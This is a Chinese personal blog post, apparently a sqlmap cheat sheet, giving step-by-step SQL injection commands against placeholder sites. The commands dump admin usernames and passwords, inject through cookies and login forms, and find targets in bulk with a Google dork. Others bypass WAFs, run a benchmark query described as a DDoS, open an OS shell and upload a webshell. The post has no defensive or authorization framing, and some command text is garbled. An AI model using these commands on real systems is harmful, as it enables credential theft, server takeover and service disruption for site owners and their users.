














<!doctype html>
<html lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
  <meta name="renderer" content="webkit">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, shrink-to-fit=no" , user-scalable="no"">
  <title>sqlmap命令乔巴Doctor</title>
  <link rel="shortcut icon" href>
  
    
    
      <link rel="stylesheet" href="/css/bootstrap.min.css">
    
      <link rel="stylesheet" href="/css/font-awesome.min.css">
    
      <link rel="stylesheet" href="/css/atom-one-dark.css">
    
      <link rel="stylesheet" href="/css/jquery.fancybox.css">
    
      <link rel="stylesheet" href="/css/nprogress.min.css">
    
      <link rel="stylesheet" href="/css/valine.css">
    
      <link rel="stylesheet" href="/css/life.css">
    
  

  

  <!-- jQuery first, then Tether, then Bootstrap JS. -->
  
  
  
    <script src="/js/jquery-2.2.4.min.js"></script>
  
    <script src="https://cdn1.lncld.net/static/js/3.1.0/av-min.js"></script>
  
    <script src="/js/jquery.pjax.js"></script>
  
    <script src="/js/nprogress.min.js"></script>
  
    <script src="/js/tether.min.js"></script>
  
    <script src="/js/bootstrap.min.js"></script>
  
    <script src="/js/highlight.min.js"></script>
  
    <script src="/js/highlightjs-line-numbers.min.js"></script>
  
    <script src="/js/jquery.fancybox.js"></script>
  
    <script src="/js/jquery.qrcode.min.js"></script>
  
    <script src="/js/Valine.min.js"></script>
  
  
</head>
<body>
<script>AV.init({appId:'',appKey:''});</script>
<script type="text/javascript">
      var config = {
            ClasS: 'Counter',
            el:'.views',
            elP: '.views-post'
      }
</script>
<div class="container">
    <div class="row blog-box-shadow">
        <!--博客主栏开始-->
        <div class="col-xl-9 col-lg-12 blog-main" id="pjax-box">
            <header class="blog-header">
                <a href="http://meetdoctor.github.io" class="blog-header-mobile-title">乔巴Doctor</a>
                <a href="javascript:;" class="blog-header-navbar-btn"><i class="fa fa-bars"></i></a>
                <nav class="blog-header-navbar blog-header-fixed">
                    <ul class="blog-navbar-links">
                        
                          <li class="blog-nav-item"><a href="/" class="transition">首页</a></li>
                        
                          <li class="blog-nav-item"><a href="/about/" class="transition">关于</a></li>
                        
                        <div class="blog-navbar-right">
                            <form action>
                                <div class="input-group">
                                    <input type="text" class="blog-header-search" placeholder="search...">
                                    <buttn type="submit" class="blog-header-search-btn"><i class="fa fa-search"></i></buttn>
                                </div>
                            </form>
                        </div>
                    </ul>
                </nav>
            </header>
                
<header class="blog-post-page-title">
    <h4>sqlmap命令</h4>
    <time datetime="2019-05-18T11:11:47.000Z"><i class="fa fa-clock-o"></i>2019-05-18</time>
    
    
    
    
	
        <span><i class="fa fa-folder-o"></i>
    		
    	       <a href="/categories/技术/" rel="categories" data-toggle="tooltip" data-placement="top" title="Linux">技术</a>
    		
        </span>
	
    
</header>
<div class="blog-main-post blog-post-page-box">
    <article class="blog-post-block blog-post-page-content">
        <section>
            
                <p>一共有11种常见SQLmap使用方法：</p>
<p>一、SQLMAP用于Access数据库注入</p>
<p>(1) 猜解是否能注入<br>win: python sqlmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a><br>Linux : .lmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a></p>
<p>(2) 猜解表<br>win: python sqlmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –tables<br>Linux: .lmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –tables</p>
<p>(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)</p>
<p>win: python sqlmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –columns -T admin<br>Linux: .lmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –columns -T admin</p>
<p>(4) 根据字段猜解内容(假如通过3得到字段为username和password)<br>win: python sqlmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –dump -T admin -C</p>
<p>“username,password”<br>Linux: .lmap.py -u “<a href="http://www.xxx.com/en/CompHonorBig.asp?id=7“" target="_blank" rel="noopener">http://www.xxx.com/en/CompHonorBig.asp?id=7“</a> –dump -T admin -C<br>“username,[url=]B[/url]password”</p>
<p>二、SQLMAP用于Cookie注入</p>
<p>(1) cookie注入，猜解表<br>win : python sqlmap.py -u “<a href="http://www.xxx.org/jsj/shownews.asp“" target="_blank" rel="noopener">http://www.xxx.org/jsj/shownews.asp“</a> –cookie “id=31” –table</p>
<p>–level 2</p>
<p>(2) 猜解字段，(通过1的表猜解字段，假如表为admin)<br>win :python sqlmap.py -u “<a href="http://www.xxx.org/jsj/shownews.asp“" target="_blank" rel="noopener">http://www.xxx.org/jsj/shownews.asp“</a> –cookie “id=31” –</p>
<p>columns -T<br>admin –level 2</p>
<p>(3) 猜解内容<br>win :python sqlmap.py -u “<a href="http://www.xxx.org/jsj/shownews.asp“" target="_blank" rel="noopener">http://www.xxx.org/jsj/shownews.asp“</a> –cookie “id=31” –dump</p>
<p>-T<br>admin -C “username,password” –level 2</p>
<p>三、SQLMAP用于mysql中DDOS攻击(1) 获取一个Shell</p>
<p>win:<br>python sqlmap.py -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> –sql-shell<br>Linux:<br>sqlmap -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> –sql-shell</p>
<p>(2) 输入执行语句完成DDOS攻击<br>select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)</p>
<p>四、SQLMAP用于mysql注入<br>(1) 查找数据库<br>python sqlmap.py -u “<a href="http://www.xxx.com/link.php?id=321“" target="_blank" rel="noopener">http://www.xxx.com/link.php?id=321“</a> –dbs</p>
<p>(2) 通过第一步的数据库查找表(假如数据库名为dataname)<br>python sqlmap.py -u “<a href="http://www.xxx.com/link.php?id=321“" target="_blank" rel="noopener">http://www.xxx.com/link.php?id=321“</a> -D dataname –tables</p>
<p>(3) 通过2中的表得出列名(假如表为table_name)<br>python sqlmap.py -u “<a href="http://www.xxx.com/link.php?id=321“" target="_blank" rel="noopener">http://www.xxx.com/link.php?id=321“</a> -D dataname -T table_name –</p>
<p>columns</p>
<p>(4) 获取字段的值(假如扫描出id,user,password字段)<br>python sqlmap.py -u “<a href="http://www.xxx.com/link.php?id=321“" target="_blank" rel="noopener">http://www.xxx.com/link.php?id=321“</a> -D dataname -T table_name -C<br>“id,user,password” –dump</p>
<p>五、SQLMAP中post登陆框注入<br>(1) 其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件</p>
<p>我们在使用Sqlmap进行post型注入时，经常会出现请求遗漏导致注入失败的情况。<br>这里分享一个小技巧，即结合burpsuite来使用sqlmap，用这种方法进行post注入测试会更准确，操作起</p>
<p>来也非常容易。</p>
<p>浏览器打开目标地址http:// <a href="http://www.xxx.com" target="_blank" rel="noopener">www.xxx.com</a> /Login.asp</p>
<p>配置burp代理(127.0.0.1:8080)以拦截请求</p>
<p>点击login表单的submit按钮</p>
<p>这时候Burp会拦截到了我们的登录POST请求</p>
<p>把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下</p>
<p>运行sqlmap并使用如下命令：<br>./sqlmap.py -r search-test.txt -p tfUPass</p>
<p>这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt，而-p 大家应该比较熟悉，指定注入用的</p>
<p>参数。<br>注入点：<a href="http://testasp.vulnweb.com/Login.asp" target="_blank" rel="noopener">http://testasp.vulnweb.com/Login.asp</a></p>
<p>几种注入方式：./sqlmap.py -r search-test.txt -p tfUPass</p>
<p>(2) 自动的搜索<br>sqlmap -u <a href="http://testasp.vulnweb.com/Login.asp" target="_blank" rel="noopener">http://testasp.vulnweb.com/Login.asp</a> –forms</p>
<p>(3) 指定参数搜索<br>sqlmap -u <a href="http://testasp.vulnweb.com/Login.asp" target="_blank" rel="noopener">http://testasp.vulnweb.com/Login.asp</a> –data “tfUName=321&amp;tfUPass=321”</p>
<p>六、SQLMAP中Google搜索注入</p>
<p>inurl后面的语言是由自己定的</p>
<p>注入过程中如果选y是注入，如果不是选n</p>
<p>sqlmap -g inurl:php?id=</p>
<p>七、SQLMAP中的请求延迟</p>
<p>参数 –delay –safe-freq</p>
<p>python sqlmap.py –dbs -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> –delay 1</p>
<p>python sqlmap.py –dbs -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> –safe-freq 3</p>
<p>参数</p>
<p>八、SQLMAP绕过WAF防火墙<br>注入点:<a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a></p>
<p>sqlmap -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> -v 3 –dbs –batch –tamper</p>
<p>“space2morehash.py”</p>
<p>space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py</p>
<p>都是编码方式</p>
<p>space2hash.py base64encode.py charencode.py</p>
<p>九、SQLMAP查看权限<br>sqlmap -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> –privileges</p>
<p>十、SQLMAP伪静态注入<br>(1) 查找数据库<br>python sqlmap.py -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> –dbs</p>
<p>(2) 通过1中的数据库查找对应的表 (假如通过1，得到的是dataname)<br>python sqlmap.py -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> -D dataname –tables</p>
<p>(3) 通过2中的数据表得到字段(假如得到的是tablename表)<br>python sqlmap.py -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> -D dataname -T<br>tablename –columns</p>
<p>(4) 通过3得到字段值(假如从3中得到字段id，password)<br>python sqlmap.py -u “<a href="http://xxx.cn/index.php/Index/view/id/40.html“" target="_blank" rel="noopener">http://xxx.cn/index.php/Index/view/id/40.html“</a> -D dataname -T<br>tablename -C “password” –dump</p>
<p>十一、SQLMAP注入点执行命令与交互写shell<br>(1) 注入点：<a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a></p>
<p>此处采用的是Linux系统<br>sqlmap -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> –os-cmd=ipconfig</p>
<p>出现语言的选择根据实际的测试网站选择语言</p>
<p>指定目标站点D:/www/</p>
<p>(2) 获取Shell<br>sqlmap -u <a href="http://192.168.159.1/news.php?id=1" target="_blank" rel="noopener">http://192.168.159.1/news.php?id=1</a> –os-shell</p>
<p>指定目标站点D:/www/</p>
<p>输入ipconfig/all</p>
<p>创建用户和删除用户</p>
<p>只要权限足够大，你可以输入使用任何命令。</p>
<p>其他命令参考下面：</p>
<p>从数据库中搜索字段</p>
<p>sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password</p>
<p>在dedecms数据库中搜索字段admin或者password。</p>
<p>读取与写入文件</p>
<p>首先找需要网站的物理路径，其次需要有可写或可读权限。</p>
<p>–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 （物理路径）</p>
<p>–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 （mssql xp_shell）</p>
<p>–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径</p>
<p>#示例：</p>
<p>sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest</p>
<p>“e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”</p>
<p>使用shell命令：</p>
<p>sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell</p>
<p>接下来指定网站可写目录：</p>
<p>“E:\php\htdocs\dvwa”</p>
<p>注：mysql不支持列目录，仅支持读取单个文件。sqlserver可以列目录，不能读写文件，但需要一个</p>
<p>（xp_dirtree函数）</p>
<p>sqlmap详细命令：</p>
<p>-is-dba 当前用户权限（是否为root权限）</p>
<p>-dbs 所有数据库</p>
<p>-current-db 网站当前数据库</p>
<p>-users 所有数据库用户</p>
<p>-current-user 当前数据库用户</p>
<p>-random-agent 构造随机user-agent</p>
<p>-passwords 数据库密码</p>
<p>-proxy <a href="http://local:8080" target="_blank" rel="noopener">http://local:8080</a> –threads 10 (可以自定义线程加速) 代理</p>
<p>-time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）</p>
<p>Options（选项）：</p>
<p>-version 显示程序的版本号并退出<br>-h, –help 显示此帮助消息并退出<br>-v VERBOSE 详细级别：0-6（默认为1）</p>
<p>Target（目标）：</p>
<p>以下至少需要设置其中一个选项，设置目标URL。</p>
<p>-d DIRECT 直接连接到数据库。<br>-u URL, –url=URL 目标URL。<br>-l LIST 从Burp或WebScarab代理的日志中解析目标。<br>-r REQUESTFILE 从一个文件中载入HTTP请求。<br>-g GOOGLEDORK 处理Google dork的结果作为目标URL。<br>-c CONFIGFILE 从INI配置文件中加载选项。</p>
<p>Request（请求）：</p>
<p>这些选项可以用来指定如何连接到目标URL。</p>
<p>-data=DATA 通过POST发送的数据字符串<br>-cookie=COOKIE HTTP Cookie头<br>-cookie-urlencode URL 编码生成的cookie注入<br>-drop-set-cookie 忽略响应的Set – Cookie头信息<br>-user-agent=AGENT 指定 HTTP User – Agent头<br>-random-agent 使用随机选定的HTTP User – Agent头<br>-referer=REFERER 指定 HTTP Referer头<br>-headers=HEADERS 换行分开，加入其他的HTTP头<br>-auth-type=ATYPE HTTP身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)<br>-auth-cred=ACRED HTTP身份验证凭据（用户名:密码）<br>-auth-cert=ACERT HTTP认证证书（key_file，cert_file）<br>-proxy=PROXY 使用HTTP代理连接到目标URL<br>-proxy-cred=PCRED HTTP代理身份验证凭据（用户名：密码）<br>-ignore-proxy 忽略系统默认的HTTP代理<br>-delay=DELAY 在每个HTTP请求之间的延迟时间，单位为秒<br>-timeout=TIMEOUT 等待连接超时的时间（默认为30秒）<br>-retries=RETRIES 连接超时后重新连接的时间（默认3）<br>-scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式<br>-safe-url=SAFURL 在测试过程中经常访问的url地址<br>-safe-freq=SAFREQ 两次访问之间测试请求，给出安全的URL</p>
<p>Enumeration（枚举）：</p>
<p>这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己的</p>
<p>SQL语句。</p>
<p>-b, –banner 检索数据库管理系统的标识<br>-current-user 检索数据库管理系统当前用户<br>-current-db 检索数据库管理系统当前数据库<br>-is-dba 检测DBMS当前用户是否DBA<br>-users 枚举数据库管理系统用户<br>-passwords 枚举数据库管理系统用户密码哈希<br>-privileges 枚举数据库管理系统用户的权限<br>-roles 枚举数据库管理系统用户的角色<br>-dbs 枚举数据库管理系统数据库<br>-D DBname 要进行枚举的指定数据库名<br>-T TBLname 要进行枚举的指定数据库表（如：-T tablename –columns）<br>-tables 枚举的DBMS数据库中的表<br>-columns 枚举DBMS数据库表列<br>-dump 转储数据库管理系统的数据库中的表项<br>-dump-all 转储所有的DBMS数据库表中的条目<br>-search 搜索列（S），表（S）和/或数据库名称（S）<br>-C COL 要进行枚举的数据库列<br>-U USER 用来进行枚举的数据库用户<br>-exclude-sysdbs 枚举表时排除系统数据库<br>-start=LIMITSTART 第一个查询输出进入检索<br>-stop=LIMITSTOP 最后查询的输出进入检索<br>-first=FIRSTCHAR 第一个查询输出字的字符检索<br>-last=LASTCHAR 最后查询的输出字字符检索<br>-sql-query=QUERY 要执行的SQL语句<br>-sql-shell 提示交互式SQL的shell</p>
<p>Optimization（优化）：</p>
<p>这些选项可用于优化SqlMap的性能。</p>
<p>-o 开启所有优化开关<br>–predict-output 预测常见的查询输出<br>–keep-alive 使用持久的HTTP（S）连接<br>–null-connection 从没有实际的HTTP响应体中检索页面长度<br>–threads=THREADS 最大的HTTP（S）请求并发量（默认为1）</p>
<p>Injection（注入）：</p>
<p>这些选项可以用来指定测试哪些参数， 提供自定义的注入payloads和可选篡改脚本。</p>
<p>-p TESTPARAMETER 可测试的参数（S）<br>–dbms=DBMS 强制后端的DBMS为此值<br>–os=OS 强制后端的DBMS操作系统为这个值<br>–prefix=PREFIX 注入payload字符串前缀<br>–suffix=SUFFIX 注入payload字符串后缀<br>–tamper=TAMPER 使用给定的脚本（S）篡改注入数据</p>
<p>Detection（检测）：</p>
<p>这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。</p>
<p>–level=LEVEL 执行测试的等级（1-5，默认为1）<br>–risk=RISK 执行测试的风险（0-3，默认为1）<br>–string=STRING 查询时有效时在页面匹配字符串<br>–regexp=REGEXP 查询时有效时在页面匹配正则表达式<br>–text-only 仅基于在文本内容比较网页</p>
<p>Techniques（技巧）：</p>
<p>这些选项可用于调整具体的SQL注入测试。</p>
<p>–technique=TECH SQL注入技术测试（默认BEUST）<br>–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）<br>–union-cols=UCOLS 定列范围用于测试UNION查询注入<br>–union-char=UCHAR 用于暴力猜解列数的字符</p>
<p>Fingerprint（指纹）：</p>
<p>-f, –fingerprint 执行检查广泛的DBMS版本指纹</p>
<p>Brute force（蛮力）：</p>
<p>这些选项可以被用来运行蛮力检查。</p>
<p>–common-tables 检查存在共同表</p>
<p>–common-columns 检查存在共同列</p>
<p>User-defined function injection（用户自定义函数注入）：</p>
<p>这些选项可以用来创建用户自定义函数。</p>
<p>–udf-inject 注入用户自定义函数</p>
<p>–shared-lib=SHLIB 共享库的本地路径</p>
<p>File system access（访问文件系统）：</p>
<p>这些选项可以被用来访问后端数据库管理系统的底层文件系统。</p>
<p>–file-read=RFILE 从后端的数据库管理系统文件系统读取文件<br>–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件<br>–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径</p>
<p>Operating system access（操作系统访问）：</p>
<p>这些选项可以用于访问后端数据库管理系统的底层操作系统。</p>
<p>–os-cmd=OSCMD 执行操作系统命令<br>–os-shell 交互式的操作系统的shell<br>–os-pwn 获取一个OOB shell，meterpreter或VNC<br>–os-smbrelay 一键获取一个OOB shell，meterpreter或VNC<br>–os-bof 存储过程缓冲区溢出利用<br>–priv-esc 数据库进程用户权限提升<br>–msf-path=MSFPATH Metasploit Framework本地的安装路径<br>–tmp-path=TMPPATH 远程临时文件目录的绝对路径</p>
<p>Windows注册表访问：</p>
<p>这些选项可以被用来访问后端数据库管理系统Windows注册表。</p>
<p>–reg-read 读一个Windows注册表项值<br>–reg-add 写一个Windows注册表项值数据<br>–reg-del 删除Windows注册表键值<br>–reg-key=REGKEY Windows注册表键<br>–reg-value=REGVAL Windows注册表项值<br>–reg-data=REGDATA Windows注册表键值数据<br>–reg-type=REGTYPE Windows注册表项值类型<br>这些选项可以用来设置一些一般的工作参数。<br>-t TRAFFICFILE 记录所有HTTP流量到一个文本文件中<br>-s SESSIONFILE 保存和恢复检索会话文件的所有数据<br>–flush-session 刷新当前目标的会话文件<br>–fresh-queries 忽略在会话文件中存储的查询结果<br>–eta 显示每个输出的预计到达时间<br>–update 更新SqlMap<br>–save file保存选项到INI配置文件<br>–batch 从不询问用户输入，使用所有默认配置。</p>
<p>Miscellaneous（杂项）：</p>
<p>–beep 发现SQL注入时提醒<br>–check-payload IDS对注入payloads的检测测试<br>–cleanup SqlMap具体的UDF和表清理DBMS<br>–forms 对目标URL的解析和测试形式<br>–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果<br>–page-rank Google dork结果显示网页排名（PR）<br>–parse-errors 从响应页面解析数据库管理系统的错误消息<br>–replicate 复制转储的数据到一个sqlite3数据库<br>–tor 使用默认的Tor（Vidalia/ Privoxy/ Polipo）代理地址<br>–wizard 给初级用户的简单向导界面</p>

            
        </section>
        <footer class="blog-post-page-tags">
        
			
				
			<a href="/tags/技术/" rel="tag" data-toggle="tooltip" data-placement="top" title="Linux">技术</a>
				
			
		
        </footer>
    </article>
    <article class="blog-post-page-readmore">
    	
    	
		
			<a href="/2019/05/18/Mssql开启与关闭xp-cmdshell/" class="blog-post-page-readmore-prev" data-toggle="tooltip" data-placement="top" title="Mssql开启与关闭xp_cmdshell">上一篇</a>
		

		
		
			<a href="/2019/05/18/nmap命令/" class="blog-post-page-readmore-next" data-toggle="tooltip" data-placement="top" title="nmap命令">下一篇</a>
		

        <div style="clear: both;"></div>
    </article>

    <article class="blog-post-block blog-post-page-content">
            <div class="row">
            
                <div class="col-md-4 col-sm-4 post-page-more-btn">
                    <span class="post-comments-btn btn btn-info btn-block" data-toggle="tooltip" data-placement="top" title="本站采用Disqus评论组件，若您没有科学上网可能会无法查看并评论">加载评论</span>
                </div>
            
                <div class="col-md-4 col-sm-4 post-page-more-btn">
                    <span data-toggle="modal" data-target="#post-donate-content">
                        <span id="post-donate-btn" class="btn btn-danger btn-block" data-toggle="tooltip" data-placement="top" title="如果您觉得本文还不错或者对您有帮助，可以考虑打赏一下作者哦">打赏本文</span>
                    </span>
                </div>
                <div class="col-md-4 col-sm-4 post-page-more-btn">
                    <span data-toggle="modal" data-target="#post-qrcode-content">
                        <span><span id="post-qrcode-btn" class="btn btn-success btn-block" data-toggle="tooltip" data-placement="top" title="微信扫描二维码手机端查看本文及分享本文">二维码</span></span>
                    </span>
                </div>
            </div>
        <div class="post-more-function-br"></div>

        <div class="modal fade" id="post-donate-content" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-header">
                        <h5 class="modal-title" id="exampleModalLabel">打赏本文</h5>
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                    </div>
                    <div class="modal-body">
                        <div class="row post-donate-content">
                            <div class="col-md-4">
                                <p>支付宝</p>
                                <img class="post-donate-content-img no-lightbox" src>
                            </div>
                            <div class="col-md-4">
                                <p>微信</p>
                                <img class="post-donate-content-img no-lightbox" src>
                            </div>
                            <div class="col-md-4">
                                <p>财付通</p>
                                <img class="post-donate-content-img no-lightbox" src>
                            </div>
                        </div>
                    </div>
                    <div class="modal-footer">
                        <button type="button" class="btn btn-secondary" data-dismiss="modal">关闭</button>
                    </div>
                </div>
            </div>
        </div>

        <div class="modal fade" id="post-qrcode-content" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
            <div class="modal-dialog modal-sm" role="document">
                <div class="modal-content">
                    <div class="modal-header">
                        <h5 class="modal-title" id="exampleModalLabel">文章二维码</h5>
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                    </div>
                    <div class="modal-body">
                        <div class="row post-qrcode-content">
                            <span class="post-qrcode-content-canvas"></span>
                            <img class="post-qrcode-content-img no-lightbox" src>
                        </div>
                    </div>
                    <div class="modal-footer">
                        <button type="button" class="btn btn-secondary" data-dismiss="modal">关闭</button>
                    </div>
                </div>
            </div>
        </div>
        
        <script>
            // post QRcode
            // 中文转码
            function toUtf8(str) {
                var out, i, len, c;
                out = "";
                len = str.length;
                for (i = 0; i < len; i++) {
                    c = str.charCodeAt(i);
                    if ((c >= 0x0001) && (c <= 0x007F)) {
                        out += str.charAt(i);
                    } else if (c > 0x07FF) {
                        out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
                        out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
                        out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
                    } else {
                        out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
                        out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
                    }
                }
                return out;
            }
            // 生成
            var qrcode= $('.post-qrcode-content-canvas').qrcode({width: 150,height: 150,text: toUtf8("http://meetdoctor.github.io/2019/05/18/sqlmap命令/")}).hide();
            var canvas=qrcode.find('canvas').get(0);
            $('.post-qrcode-content-img').attr('src',canvas.toDataURL('image/jpg'));
        </script>

        
        
            <div id="disqus_thread"></div>
            <script data-no-instant>
                $(document).ready(function() {
                    $('.post-comments-btn').on('click', function(){
                        var disqus_shortname = 'meetdoctor';
                        $.ajax({
                            type: "GET",
                            url: "https://" + disqus_shortname + ".disqus.com/embed.js",
                            dataType: "script",
                            cache: true
                        });
                        $('.post-more-function-br').css('height','.6em');
                    });
                });
                var reset = function (newIdentifier, newUrl, newTitle, newLanguage) {
                    DISQUS.reset({
                        reload: true,
                        config: function () {
                            this.page.identifier = newIdentifier;
                            this.page.url = newUrl;
                            this.page.title = newTitle;
                            this.language = newLanguage;
                        }
                    });
                };
            </script>
            
    </article>
    
</div>

                
            <footer class="blog-footer">
                <p class="blog-footer-left">Copyright ©  2019 <a href="http://meetdoctor.github.io">乔巴Doctor</a></p>
                <p class="blog-footer-right">Powered by <a href="https://hexo.io" target="_blank">Hexo</a>,Theme <a href="https://note.isweic.com/themes-life/" target="_blank">Life</a></p>
            </footer>
        </div><!--博客主栏结束-->
        <!--博客侧边栏开始-->
        <div class="col-xl-3 blog-sidebar">
            <div class="blog-sidebar-title">
                <a href>乔巴Doctor</a>
            </div>
            <div class="blog-sidebar-logo">
                <img src="/images/qiaoba.jpg">
            </div>
            <div class="blog-sidebar-count blog-sidebar-padding">
                <div class="blog-sidebar-count-left">
                    <p class="blog-sidebar-count-p">33</p>
                    <span class="blog-sidebar-count-span">文章</span>
                </div>
                <div class="blog-sidebar-count-right">
                    <p class="blog-sidebar-count-p">27</p>
                    <span class="blog-sidebar-count-span">标签</span>
                </div>
                <div style="clear: both;"></div>
            </div>
            <div class="blog-sidebar-icon blog-sidebar-padding">
                <ul>
                    <li><a href="https://github.com/github" class="icon-github" target="_blank" data-toggle="tooltip" data-placement="top" title="Github"><i class="fa fa-github"></i></a></li>
                    <li><a href class="icon-weibo" target="_blank" data-toggle="tooltip" data-placement="top" title="新浪微博"><i class="fa fa-weibo"></i></a></li>
                    <li><a href class="icon-twitter" target="_blank" data-toggle="tooltip" data-placement="top" title="Twitter"><i class="fa fa-twitter"></i></a></li>
                    <!--<li><a href="" class="icon-facebook" target="_blank" data-toggle="tooltip" data-placement="top" title="FaceBook"><i class="fa fa-facebook"></i></a></li>-->
                    <li><a href="mailto:" class="icon-email" data-toggle="tooltip" data-placement="top" title="E-Mail"><i class="fa fa-envelope"></i></a></li>
                    <li><a href class="icon-rss" data-toggle="tooltip" target="_blank" data-placement="top" title="RSS"><i class="fa fa-rss"></i></a></li>
                </ul>
            </div>
            <div class="blog-sidebar-categories">
                <h4 class="blog-sidebar-h4"><i class="fa fa-folder-open"></i>&nbsp;文章分类</h4>
                <ul class="list-group blog-sidebar-padding">
                  
                    
                      <li class="list-group-item justify-content-between">
                          <a href="/categories/技术/">技术</a>
                          <span class="badge badge-default badge-pill">25</span>
                      </li>
                    
                      <li class="list-group-item justify-content-between">
                          <a href="/categories/生活趣事/">生活趣事</a>
                          <span class="badge badge-default badge-pill">4</span>
                      </li>
                    
                      <li class="list-group-item justify-content-between">
                          <a href="/categories/k先生专栏/">k先生专栏</a>
                          <span class="badge badge-default badge-pill">3</span>
                      </li>
                    
                      <li class="list-group-item justify-content-between">
                          <a href="/categories/法律/">法律</a>
                          <span class="badge badge-default badge-pill">1</span>
                      </li>
                    
                  
                </ul>
            </div>
            <div class="blog-sidebar-tags">
                <h4 class="blog-sidebar-h4"><i class="fa fa-tag"></i>&nbsp;标签云</h4>
                <ul class="blog-sidebar-tags-ul blog-sidebar-padding">
                  
                    
                      <li><a href="/tags/ctf/" class="tag-could" data-toggle="tooltip" data-placement="top" title="ctf">ctf</a></li>
                    
                      <li><a href="/tags/个人观点/" class="tag-could" data-toggle="tooltip" data-placement="top" title="个人观点">个人观点</a></li>
                    
                      <li><a href="/tags/py小脚本/" class="tag-could" data-toggle="tooltip" data-placement="top" title="py小脚本">py小脚本</a></li>
                    
                      <li><a href="/tags/爆破/" class="tag-could" data-toggle="tooltip" data-placement="top" title="爆破">爆破</a></li>
                    
                      <li><a href="/tags/闲聊/" class="tag-could" data-toggle="tooltip" data-placement="top" title="闲聊">闲聊</a></li>
                    
                      <li><a href="/tags/sqlserver/" class="tag-could" data-toggle="tooltip" data-placement="top" title="sqlserver">sqlserver</a></li>
                    
                      <li><a href="/tags/xss/" class="tag-could" data-toggle="tooltip" data-placement="top" title="xss">xss</a></li>
                    
                      <li><a href="/tags/技术/" class="tag-could" data-toggle="tooltip" data-placement="top" title="技术">技术</a></li>
                    
                      <li><a href="/tags/cms/" class="tag-could" data-toggle="tooltip" data-placement="top" title="cms">cms</a></li>
                    
